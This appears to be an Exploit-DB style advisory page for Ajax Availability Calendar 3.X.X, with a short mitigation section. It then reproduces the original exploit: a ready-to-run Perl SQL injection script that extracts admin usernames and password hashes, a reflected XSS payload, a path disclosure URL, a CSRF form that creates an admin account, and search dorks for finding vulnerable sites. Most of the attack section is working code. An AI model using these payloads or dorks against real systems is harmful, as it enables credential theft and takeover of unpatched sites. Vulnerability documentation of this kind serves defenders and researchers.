Ajax Availability Calendar 3.X.X Multiple Vulnerabilties

vendor:

Ajax Availability Calendar

by:

AtT4CKxT3rR0r1ST

7.5

CVSS

HIGH

Sql Injection, Reflected XSS, Full Path Disclosure

89, 79, 200

CWE

Product Name: Ajax Availability Calendar

Affected Version From: 3.X.X

Affected Version To: 3.X.X

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Ajax Availability Calendar 3.X.X Multiple Vulnerabilties

The Ajax Availability Calendar 3.X.X script is vulnerable to SQL Injection, Reflected XSS, and Full Path Disclosure vulnerabilities. The SQL Injection vulnerability allows an attacker to execute arbitrary SQL commands through the 'id_item' parameter, leading to unauthorized access to the database. The Reflected XSS vulnerability allows an attacker to inject malicious scripts into the 'id_item' parameter, potentially leading to the execution of arbitrary code in the victim's browser. The Full Path Disclosure vulnerability allows an attacker to obtain the full path of the script, which may aid in further attacks.

Mitigation:

To mitigate the SQL Injection vulnerability, it is recommended to properly sanitize user input and use parameterized queries. To mitigate the Reflected XSS vulnerability, it is recommended to properly encode user input before displaying it in HTML contexts. To mitigate the Full Path Disclosure vulnerability, it is recommended to disable error reporting or handle errors in a secure manner.

Source

Exploit-DB raw data:

Ajax Availability Calendar 3.X.X Multiple Vulnerabilties
==============================================================
 
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.ajaxavailabilitycalendar.com/
.:. Dork           : intitle:"Ajax Availability Calendar"   ,   inurl:"/ac-admin/index.php"
####################################################################
===[ Exploit ]===

Sql Injection:
==============
#!/usr/bin/perl -w

# Ajax Availability Calendar 3.X.X Remote SQL Injection Vulnerability
# Author      : AtT4CKxT3rR0r1ST  
# Contact     : F.Hack@w.cn
# Script      : http://www.ajaxavailabilitycalendar.com/
# Admin Panel : www.site.com/ac-admin/ 
sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
clear();
print "|----------------------------------------------------|\n";
print "|          'Ajax Availability Calendar 3.X.X'        |\n";
print "| Coded by   : AtT4CKxT3rR0r1ST                      |\n";
print "|----------------------------------------------------|\n";
use LWP::UserAgent;
print "\nInsert Target:";
chomp(my $target=<STDIN>);
print "\n[!] Exploiting Progress...\n";
print "\n";
#Nama Column
$Column="group_concat(username,0x3a,password)";
#Nama Table
$table="bookings_admin_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "?id_item=null and 1=2 union select ".$Column."+from/**/".$table."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/:(.*):([0-9a-fA-F]{32})/){
print "\n[+] Admin User : $1\n";
}if($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n";
print "[+] Success !!\n";

}



else{print "[-] Unable To Get The Information...\n";
}


Reflected XSS:
==============

www.site.com/?id_item='"--></style></script><script>alert(0x000581)</script>


Full Path Disclosure:
====================

www.site.com/ac-includes/common.inc.php


CSRF:
=====
[Add Admin]
-------------

<form method="POST" name="form0" action="http://www.site.com/ac-admin/index.php?page=admin_users&action=new">
<input type="hidden" name="add[username]" value="admin"/>
<input type="hidden" name="password" value="Palestine"/>
<input type="hidden" name="password2" value="Palestine"/>
</form>

</body>
</html>
####################################################################